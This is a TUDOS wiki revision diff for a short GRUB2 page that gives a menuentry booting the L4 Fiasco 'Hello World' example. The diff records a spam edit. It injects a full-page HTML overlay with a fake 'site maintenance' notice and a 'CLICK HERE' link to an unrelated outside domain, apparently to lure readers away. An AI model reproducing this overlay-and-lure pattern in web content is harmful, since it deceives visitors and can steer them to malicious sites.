GRUB2: Difference between revisions
From TUDOS-Wiki
Jump to navigationJump to search
Created page with '== GRUB2 == GRUB2 uses a different configuration file syntax. The following boots the famous 'Hello World'. menuentry "L4 hello" { multiboot /bootstrap -serial module /f…' |
No edit summary |
||
Line 1: | Line 1: | ||
---- | |||
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;"> | |||
---- | |||
=[http://ekygelymib.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]= | |||
---- | |||
=[http://ekygelymib.co.cc CLICK HERE]= | |||
---- | |||
</div> | |||
== GRUB2 == | == GRUB2 == | ||
Revision as of 06:18, 24 November 2010
GRUB2
GRUB2 uses a different configuration file syntax. The following boots the famous 'Hello World'.
menuentry "L4 hello" { multiboot /bootstrap -serial module /fiasco /fiasco -serial_esc module /sigma0 /sigma0 module /roottask /roottask module /hello /hello }